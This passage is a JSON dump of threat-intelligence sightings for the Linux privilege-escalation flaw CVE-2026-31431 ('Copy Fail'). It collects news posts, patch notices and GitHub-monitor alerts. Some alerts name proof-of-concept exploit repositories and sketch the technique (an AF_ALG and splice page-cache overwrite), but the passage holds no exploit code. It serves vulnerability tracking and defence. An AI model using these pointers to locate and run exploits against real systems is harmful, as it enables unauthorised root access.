"0fb59c20-5919-4359-9ad7-236fa6f55d87", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82592", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a vyahello\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-03 07:57:39\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nLinux local privilege escalation PoC for CVE-2026-31431\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-03T08:00:04.000000Z"}, {"uuid": "a48c39a1-2b31-45ea-98b4-5baf5d2fbaff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "exploited", "source": "Telegram/dBmf3IHc7_vk8hzgQ1wzPOzIXlDC6C93o_RQuOw8YMcVFA", "content": "", "creation_timestamp": "2026-05-03T11:40:22.000000Z"}, {"uuid": "316626a0-f259-4859-9435-7f2d9ae8080d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/TengkorakCyberCrewzz/10101", "content": "CISA Adds Actively Exploited Linux Root Access Bug CVE-2026-31431 to KEV \u2013 thehackernews.com\n\nSun, 03 May 2026 14:26:00", "creation_timestamp": "2026-05-03T12:03:00.000000Z"}, {"uuid": "bce66acb-bc57-4955-8ad0-6d9e3a00d7b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82631", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a Weekly-Breach-Investigation--006\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a jamal-soc21\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a None\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-03 13:49:04\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nRepository documenting the Copy Fail (CVE-2026-31431) Linux kernel vulnerability, a local privilege escalation flaw enabling root access and mapped to MITRE ATT&CK techniques.\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-03T14:00:04.000000Z"}, {"uuid": "c31117d8-3d89-4614-9933-39c70e71535f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://www.cert.si/si-cert-2026-03", "content": "", "creation_timestamp": "2026-05-03T06:49:58.000000Z"}, {"uuid": "5d664502-ae44-4095-b193-dc666160482f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hexonbot.bsky.social/post/3mkxvc2ekuc2p", "content": "AI found a Linux kernel bug in 1 hour. Copy Fail (CVE-2026-31431) gives local users root with 732 bytes of Python and turns containers into escape hatches. https://www.hexon.bot/blog/copy-fail-cve-2026-31431-ai-discovered-linux-root #Linux #Cybersecurity #AI", "creation_timestamp": "2026-05-03T19:28:03.948954Z"}, {"uuid": "7c6ea645-d359-4159-b314-4c5f1619a9f5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3mkxw63d4ii2h", "content": "Re: CVE-2026-31431: CopyFail: linux local privilege scalation", "creation_timestamp": "2026-05-03T19:43:43.981951Z"}, {"uuid": "b473c541-010a-41b2-881c-ec938fdb119f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82660", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a kaleth4\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-03 18:59:54\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u65e0\u63cf\u8ff0\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-03T19:00:04.000000Z"}, {"uuid": "9b56cac3-6a4a-49df-acb6-bb6420f0a017", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/technoholic.bsky.social/post/3mkxx5siuvv2o", "content": "CISA adds CVE-2026-31431 (CVSS 7.8), a Linux privilege escalation flaw, to KEV due to active exploitation. Stay updated and patch your systems!", "creation_timestamp": "2026-05-03T20:01:28.490347Z"}, {"uuid": "420b3200-cfc1-4a82-9329-b7ff9b07c4bc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3mkykugmtvq2h", "content": "Re: Precise disclosure contents for copyfail (Re: [oss-security] CVE-2026-31431: CopyFail: linux local privilege scalation)", "creation_timestamp": "2026-05-04T01:54:09.227573Z"}, {"uuid": "0c85ec5b-4449-4e06-b5b0-d00226bf3fc9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/ronan.mastodon.ronandev.ovh.ap.brid.gy/post/3mkzekczzhrd2", "content": "https://security-tracker.debian.org/tracker/CVE-2026-31431\n\n\u00ab In the Linux kernel, the following vulnerability has been resolved: crypto: algif_aead - Revert to operating out-of-place This mostly reverts commit 72548b093ee3 except for the copying of the associated data. There is no benefit in [\u2026]", "creation_timestamp": "2026-05-04T09:36:43.160111Z"}, {"uuid": "6a7db408-7251-4e71-9200-1feed75e6d10", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/T6MjwEy1GXd0xTLgBckUymGQqfeNIMlbkOpXvJPPSDtMl2M", "content": "", "creation_timestamp": "2026-05-03T15:00:06.000000Z"}, {"uuid": "4520e360-cdef-4179-b247-11bc927c9385", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hacker.at.thenote.app/post/3mkywi2vkq22g", "content": "CISA Adds Actively Exploited Linux Root Access Bug CVE-2026-31431 to KEV\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Friday added a recently disclosed security flaw impacting various Linux distributions to its Known Exploited Vulnerabilities (KEV) catalog,\u2026\n#hackernews #news", "creation_timestamp": "2026-05-04T05:21:59.110757Z"}, {"uuid": "32cc9e20-180d-4078-b811-0e39e1c2b9cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://www.hkcert.org/security-bulletin/qnap-nas-elevation-of-privilege-vulnerability_20260504", "content": "", "creation_timestamp": "2026-05-03T18:00:00.000000Z"}, {"uuid": "1d575e09-9337-4b9e-a455-e495ecaacdf1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/82704", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a BigFix-CopyFail-AlmaLinux-Content\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a kvendler\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a None\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-04 03:56:29\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nThis repository contains BigFix Content that I created for identifying the AlmaLinux systems that require patching to remediate CVE-2026-31431\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-04T04:00:04.000000Z"}, {"uuid": "5e3f6d25-6f47-486e-bd75-2036dde3520e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/tech-trending.bsky.social/post/3mkyypu7ozc2r", "content": "WSL2+Docker\u74b0\u5883\u306b\u304a\u3051\u308b\u3001CVE-2026-31431 (Copy Fail) \u3078\u306e\u5bfe\u7b56\u30e1\u30e2\nhttps://zenn.dev/user_thebigslee/articles/41b570658f911b", "creation_timestamp": "2026-05-04T06:02:09.178034Z"}, {"uuid": "5c5364eb-9cc5-4828-9ce0-dfd9d4a070ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/reconbee.bsky.social/post/3mkyyzso4ms2g", "content": "CISA Adds Actively Exploited Linux Root Access Bug CVE-2026-31431 to KEV reconbee.com/cisa-adds-ac...\n\n#CISA #linuxrootaccess #CVE #Linuxroot #cyberattack", "creation_timestamp": "2026-05-04T06:07:46.145954Z"}, {"uuid": "0d768853-e76f-4256-ac1d-782a835adda5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/pvynckier.bsky.social/post/3mkyzhcacfs2f", "content": "CISA Adds Actively Exploited Linux Root Access Bug CVE-2026-31431 to KEV thehackernews.com/2026/05/cisa...", "creation_timestamp": "2026-05-04T06:15:47.509227Z"}, {"uuid": "3385142c-2387-4d73-8456-0b2794029c5b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82725", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a copy-fail-CVE-2026-31431-detection-probe\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a ochebotar\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a None\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-04 05:58:51\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u65e0\u63cf\u8ff0\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-04T06:00:04.000000Z"}, {"uuid": "9ed986f3-df9f-43d1-8a65-03441f88a57a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/mmmmmmpc.bsky.social/post/3mkz4o5vflk2j", "content": "Please Read: @suse.com response to #copyfail CVE-2026-31431 vulnerability:\n* It affects from SLES 12 SP5 to SLES 16\n* It affects Muti-Linux Support 8, 9 and 10\n* Patches have been released by SUSE Engineering\nPlease Patch!\nwww.suse.com/c/suse-respo...", "creation_timestamp": "2026-05-04T07:12:46.775184Z"}, {"uuid": "794c70b1-9496-409f-adbb-d9657f01850d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/samuelvermeulenpro.bsky.social/post/3mkz4soqgbg2e", "content": "#ActuLibre - Copy Fail (CVE-2026-31431) : Synth\u00e8se technique sur cette faille Linux \u00e0 lire sur\nhttps://www.linuxtricks.fr/news/10-logiciels-libres/600-copy-fail-cve-2026-31431-synthese-technique-sur-cette-faille-linux/", "creation_timestamp": "2026-05-04T07:15:18.875973Z"}, {"uuid": "91f2ac63-a47d-4fce-a731-8b81c2ca307b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "c933734a-9be8-4142-889e-26e95c752803", "vulnerability": "CVE-2026-31431", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/3e01e7d3-c2be-4035-865c-115c5aef1b92", "content": "", "creation_timestamp": "2026-05-04T07:19:37.256007Z"}, {"uuid": "3ceffd20-c9ae-42fb-8598-2dacaa09812e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/adriend.linuxtricks.fr/post/3mkz75n7g4s2s", "content": "Apr\u00e8s la vid\u00e9o sur la faille Copy Fail (CVE-2026-31431), je vous propose cette fois-ci une analyse technique EN FRANCAIS ! (car ce type de contenu manque)\nJ'y ai pass\u00e9 mon dimanche matin !\nClin d'oeil \u00e0 @ponceto91.bsky.social et @korben.info \nwww.linuxtricks.fr/news/10-logi...\n\n#CopyFail #Linux", "creation_timestamp": "2026-05-04T07:57:13.728945Z"}, {"uuid": "bb0e9a66-aa47-4ae8-a5a5-f331db331830", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://ioc.exchange/users/sbeyer/statuses/116515265697196856", "content": "60 Sekunden Cyber KW18 2026, 27. April - 3. Mai:\nDaten von Kunden und Benutzern von Vimeo werden von der Gruppierung ShinyHunters ins Dark Net gestellt, Sicherheitsforscher finden mit Copy Fail eine seit 2017 (!) bestehende Schwachstelle (CVE-2026-31431), mit der man root-Zugriff auf allen bekannteren Linux-Distributionen erhalten kann, das NGO noyb klagt gegen die Hamburger https://podcasters.spotify.com/pod/show/60-sekunden-cyber/episodes/KW18-2026--27--April---3--Mai-e3ir1h5", "creation_timestamp": "2026-05-04T08:04:31.036122Z"}, {"uuid": "1bb3387c-8918-4b42-a7ed-8e35402300e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/r-blueteamsec.bsky.social/post/3mkzbjd4tlm2b", "content": "CVE-2026-31431\uff1a\u6211\u7528 DeepSeek \u590d\u73b0\u4e86 AI \u53d1\u73b0Copy Fail \u63d0\u6743\u7684\u5168\u8fc7\u7a0b - CVE-2026-31431: I used DeepSeek to reproduce the entire process of AI detecting Copy Fail privilege escalation.", "creation_timestamp": "2026-05-04T08:39:32.618452Z"}, {"uuid": "c10078df-a913-4e2d-9bf1-b73b610760f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/se-nyheter.bsky.social/post/3mkzf6oblyq2a", "content": "Kritisk s\u00e5rbarhet utg\u00f6r ett hot mot Linux-anv\u00e4ndare\n\nhttps://www.europesays.com/se/236328/\n\nS\u00e4kerhetsforskare varnar f\u00f6r Copy Fail (CVE-2026-31431), en kritisk s\u00e5rbarhet som utg\u00f6r ett hot mot anv\u00e4ndare som k\u00f6r ett\u2026", "creation_timestamp": "2026-05-04T09:45:09.977462Z"}, {"uuid": "01f93a89-1924-427e-bfa4-15e7acca5f0c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://ioc.exchange/users/sbeyer/statuses/116515712091156433", "content": "60 Sekunden Cyber KW18 2026, 27. April - 3. Mai:\nDaten von Kunden und Benutzern von Vimeo werden von der Gruppierung ShinyHunters ins Dark Net gestellt, Sicherheitsforscher finden mit Copy Fail eine seit 2017 (!) bestehende Schwachstelle (CVE-2026-31431), mit der man root-Zugriff auf allen bekannteren Linux-Distributionen erhalten kann, das NGO noyb klagt gegen die Hamburger Datenschutzbeh\u00f6rde wegen Unt\u00e4\nhttps://www.60-sekunden-cyber.de/kw18-2026/\n#cyber #cybersicherheit", "creation_timestamp": "2026-05-04T09:57:53.725787Z"}, {"uuid": "2966a11d-0af0-4714-86a4-c93c206d8d78", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/roberio-batista.bsky.social/post/3mky26vueic2b", "content": "Encontrado pelo Xint Code, a vulnerabilidade de seguran\u00e7a Copy Fail (CVE-2026-31431), foi corrigida no Debian, no Ubuntu, AlmaLinux OS e outras distribui\u00e7\u00f5es populares afetadas por essa falha.\n\nOBS: A descoberta foi feita com o apoio de uma ferramenta de intelig\u00eancia artificial chamada Xint Code.", "creation_timestamp": "2026-05-03T20:55:15.466684Z"}, {"uuid": "aca9c81c-0cf0-4891-b889-5375ad55d089", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82664", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CopyFail-for-dummies\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a ChernStepanov\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a C++\n\u2b50 Star\u6570\u91cf\uff1a 1  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-03 19:57:38\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nA tiny explanation + PoC for CVE-2026-31431\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-03T20:00:04.000000Z"}, {"uuid": "39f7250e-1190-4124-a316-0cf53ed5ad37", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosec.skyfleet.blue/post/3mky376podd22", "content": "Precise disclosure contents for copyfail (Re: [oss-security] CVE-2026-31431: CopyFail: linux local privilege scalation)", "creation_timestamp": "2026-05-03T21:13:50.042397Z"}, {"uuid": "078b3edc-35ed-4f05-a9cb-edda1cadf89b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/ninjaowl.ai/post/3mky644nc6h2w", "content": "CISA Adds Actively Exploited Linux Root Access Bug CVE-2026-31431 to KEV #cybersecurity #hacking #news #infosec #security #technology #privacy thehackernews.com/20...", "creation_timestamp": "2026-05-03T22:05:48.688945Z"}, {"uuid": "fcc825c0-7981-4b0a-934d-6a4f275a6996", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/frei-style.net/post/3mky7o5n4tk23", "content": "If you are talking about CVE-2026-31431 (Copy Fail.) then yes, it was discovered with the help of Theori Xint Code, an AI powered software, by the researcher Taeyang Lee who is working for Theori since 2019. Link to the write up: xint.io/blog/copy-fa...", "creation_timestamp": "2026-05-03T22:33:51.734106Z"}, {"uuid": "291d3b72-507b-4e55-ab51-83677d065e1f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://infosec.exchange/users/edwardk/statuses/116513116081777494", "content": "The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2026-31431, a Linux root access bug also known as Copy Fail, to its Known Exploited Vulnerabilities catalog due to active exploitation. This privilege escalation flaw allows unprivileged local users to gain root access by corrupting the kernel's page cache, posing a significant risk to cloud and containerized environments.https://thehackernews.com/2026/05/cisa-adds-actively-exploited-linux-root.html", "creation_timestamp": "2026-05-03T22:57:41.647420Z"}, {"uuid": "49036ce0-967b-4316-a0ee-4c56bb20af9e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/icsda.bsky.social/post/3mkydottyfa2m", "content": "\u4f60\u5404\u4f4d\u7684cPanel\u53c8\u88abSorry\u52d2\u7d22\u4e86\u6c92\uff1f\ud83d\ude05 \u5225\u4ee5\u70baLinux\u5c31\u6c92\u4e8b\uff0cCISA\u628a\u90a3\u500bLPE\u6f0f\u6d1e\uff08CVE-2026-31431\uff09\u5217\u5165KEV\u6e05\u55ae\u5566\uff0c\u6839\u6b0a\u8981\u88ab\u596a\u8d70\u4e86\uff01Fortinet 8.0\u9084\u5728\u8b1bAI\u3001\u91cf\u5b50\u5b89\u5168\uff0c\u9019\u901f\u5ea6\u5dee\u6709\u9ede\u591a\u9f41\u3002\u8d95\u5feb\u4fee\uff0c\u4e0d\u7136\u660e\u5929\u5225\u60f3\u898b\u8001\u95c6\uff01 #\u8cc7\u5b89\u8b66\u5831 #Linux #\u52d2\u7d22\u8edf\u9ad4", "creation_timestamp": "2026-05-03T23:45:45.484702Z"}, {"uuid": "7bc6d0df-f3d5-488b-ade6-de2c95a54d8a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/qhz-xmRgIk63jLSrK2_FE81USJ0RiYiUMNcM_dhi03aP8g", "content": "", "creation_timestamp": "2026-05-03T23:33:56.000000Z"}, {"uuid": "d5b406fd-020f-4a43-a078-fb4c6c5d4dfe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://threatintel.cc/2026/05/03/cisa-adds-actively-exploited-linux.html", "content": "CISA Adds Actively Exploited Linux Root Access Bug CVE-2026-31431 to KEV\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2026-31431, a Linux root access bug also known as Copy Fail, to its Known Exploited Vulnerabilities catalog due to active exploitation. This privilege escalation flaw allows unprivileged local users to gain root access by corrupting the kernel’s page cache, posing a significant risk to cloud and containerized environments.", "creation_timestamp": "2026-05-03T20:57:51.000000Z"}, {"uuid": "9442d0ee-1a92-48a4-b777-bdf3b0b0c44f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hatena-bookmark.bsky.social/post/3mkyiolu2t72y", "content": "#\ud83d\udd16\u30c6\u30af\u30ce\u30ed\u30b8\u30fc\nWSL2+Docker\u74b0\u5883\u306b\u304a\u3051\u308b\u3001CVE-2026-31431 (Copy Fail) \u3078\u306e\u5bfe\u7b56\u30e1\u30e2\n\nTL;DR \u7d50\u8ad6\u304b\u3089\u8a00\u3046\u3068\u3001\u300cDocker\u3092v29.4.2\u4ee5\u964d\u3078\u30a2\u30c3\u30d7\u30c7\u30fc\u30c8\uff08\u6052\u4e45\u7684\uff09\u300d\u3068\u300c.wslconfig\u306b\u3088\u308balgif_aead\u306e\u7121\u52b9\u5316\uff08\u66ab\u5b9a\u7684\uff09\u300d\u306e2\u6bb5\u69cb\u3048\u304c\u73fe\u72b6\u306e\u6700\u9069\u89e3\u3067\u3059\u3002 \u306f\u3058\u3081\u306b Linux\u30ab\u30fc\u30cd\u30eb\u306e\u6a29\u9650\u6607\u683c\u8106\u5f31\u6027\u300cCopy Fail\uff08CVE-2026-31431\uff09\u300d\u304c\u3001GW\u771f\u3063\u53ea\u4e2d\u306e\u4e16\u9593\u3092\u9a12\u304c\u305b\u3066\u3044\u307e\u3059\u3002 \u30ed\u30fc\u30ab\u30eb\u30e6\u30fc\u30b6\u30fc\u304c\u5bb9\u6613\u306broo\nhttps://zenn.dev/user_thebigslee/articles/41b570658f911b", "creation_timestamp": "2026-05-04T01:15:06.452468Z"}, {"uuid": "8e002c59-603a-4e85-9b92-2ac926c2a1cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/82731", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a copy-fail-CVE-2026-31431-shell\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a g1nt0n1x\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Shell\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-04 07:55:57\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nPoC shell exploit for CVE-2026-31431 (copy_fail) \u2014 Linux LPE via AF_ALG + splice page-cache overwrite. Single-shot, no race condition, kernel 4.9\u20136.18.\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-04T08:00:04.000000Z"}, {"uuid": "960dd99c-c976-4ca6-bdf9-149c5625e4a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": 